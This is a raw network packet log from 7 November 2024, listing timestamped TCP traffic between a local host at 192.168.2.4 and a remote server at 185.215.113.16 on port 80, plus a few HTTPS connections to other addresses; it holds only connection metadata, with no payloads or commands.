Nov 7, 2024 07:33:23.740523100 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.740530968 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.740533113 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.740545034 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.740556002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.740566015 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.740566969 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.740576982 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.740586996 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.740587950 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.740597010 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.740611076 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.740631104 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.741343021 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.741354942 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.741365910 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.741375923 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.741389990 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.741427898 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.742201090 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.742245913 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.742264032 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.742275000 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.742311001 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.742445946 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.742455959 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.742487907 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.775177002 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.775192022 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.775203943 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.775243044 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.775265932 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.775295973 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.775306940 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.775342941 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.775484085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.775496006 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.775542974 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.775718927 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.775733948 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.775744915 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.775757074 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.775774002 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.775810957 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.775969028 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.775984049 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.775995016 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.776005030 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.776061058 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.797199011 CET	49893	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:23.797216892 CET	443	49893	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:23.797329903 CET	49893	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:23.797699928 CET	49893	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:23.797715902 CET	443	49893	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:23.856682062 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.856722116 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.856734991 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.856755018 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.856780052 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.856952906 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.856966019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.856997967 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.857033968 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.857136965 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.857146025 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.857161999 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.857182980 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.857213974 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.857394934 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.857405901 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.857410908 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.857422113 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.857434034 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.857443094 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.857444048 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.857479095 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.857502937 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.857851982 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.857862949 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.857872009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.857883930 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.857894897 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.857908010 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.857911110 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.857923985 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.857942104 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.858515978 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.858525991 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.858536959 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.858546972 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.858556032 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.858566046 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.858566999 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.858577967 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.858588934 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.858599901 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.858628988 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.858628988 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.858639956 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.859390020 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.859401941 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.859411955 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.859424114 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.859442949 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.859467983 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.859474897 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.859479904 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.859489918 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.859508038 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.859519005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.859519005 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.859529972 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.859536886 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.859539986 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.859549999 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.859570980 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.859595060 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.860737085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.860749006 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.860758066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.860769987 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.860780954 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.860791922 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.860795975 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.860801935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.860817909 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.860821962 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.860829115 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.860838890 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.860841990 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.860848904 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.860862017 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.860881090 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.860908985 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.861376047 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.861388922 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.861397982 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.861409903 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.861419916 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.861432076 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.861434937 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.861445904 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.861454964 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.861459970 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.861468077 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.861491919 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.861511946 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.895107985 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.895169973 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.895189047 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.895205975 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.895239115 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.895270109 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.895431995 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.895442963 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.895452023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.895462990 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.895474911 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.895478010 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.895514965 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.895921946 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.895932913 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.895944118 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.895955086 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.895965099 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.895966053 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.895993948 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.896008968 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.896347046 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.896357059 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.896392107 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.976902962 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.976962090 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.977032900 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.977046013 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.977072001 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.977086067 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.977159023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.977171898 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.977206945 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.977376938 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.977387905 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.977430105 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.977618933 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.977629900 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.977638960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.977649927 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.977663994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.977667093 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.977686882 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.977699041 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.978127003 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.978142023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.978152037 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.978163004 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.978173971 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.978176117 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.978183985 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.978214025 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.978595972 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.978607893 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.978616953 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.978626966 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.978636026 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.978638887 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.978652954 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.978661060 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.978663921 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.978673935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.978683949 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.978694916 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.978697062 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.978722095 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.978745937 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.979579926 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.979590893 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.979599953 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.979612112 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.979620934 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.979629993 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.979635000 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.979645014 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.979656935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.979667902 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.979670048 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.979682922 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.979698896 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.979718924 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.979741096 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.980555058 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.980566025 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.980575085 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.980586052 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.980597019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.980607033 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.980616093 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.980617046 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.980629921 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.980643034 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.980648994 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.980676889 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.980695009 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.981481075 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.981492043 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.981501102 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.981518030 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.981534004 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.981537104 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.981545925 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.981555939 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.981565952 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.981574059 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.981578112 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:23.981590986 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.981606007 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:23.981632948 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.007693052 CET	443	49886	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.014358044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.014410019 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.014437914 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.014448881 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.014481068 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.014663935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.014674902 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.014703989 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.014862061 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.014874935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.014887094 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.014902115 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.014930964 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.015096903 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.015113115 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.015129089 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.015136957 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.015139103 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.015150070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.015157938 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.015158892 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.015171051 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.015176058 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.015208960 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.031672955 CET	49886	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.031696081 CET	443	49886	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.032330990 CET	49886	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.032335997 CET	443	49886	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.041312933 CET	443	49887	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.041640997 CET	49887	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.041655064 CET	443	49887	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.048578024 CET	49887	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.048584938 CET	443	49887	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.050488949 CET	443	49889	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.051580906 CET	49889	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.051595926 CET	443	49889	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.052128077 CET	49889	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:24.052134037 CET	443	49889	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.056950092 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.057009935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.057020903 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.057049990 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.057081938 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.090325117 CET	443	49890	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:24.096384048 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.096395969 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.096424103 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.096447945 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.096486092 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.096713066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.096724987 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.096735001 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.096751928 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.096779108 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.096807957 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.096846104 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.096946001 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.096956015 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.096996069 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.097167015 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.097177982 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.097187042 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.097198009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.097209930 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.097238064 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.097625971 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.097636938 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.097647905 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.097660065 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.097668886 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.097680092 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.097698927 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.098066092 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.098077059 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.098086119 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.098098040 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.098109007 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.098113060 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.098119020 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.098129988 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.098140955 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:24.098156929 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:24.098177910 CET	49882	80	192.168.2.4	185.215.113.16
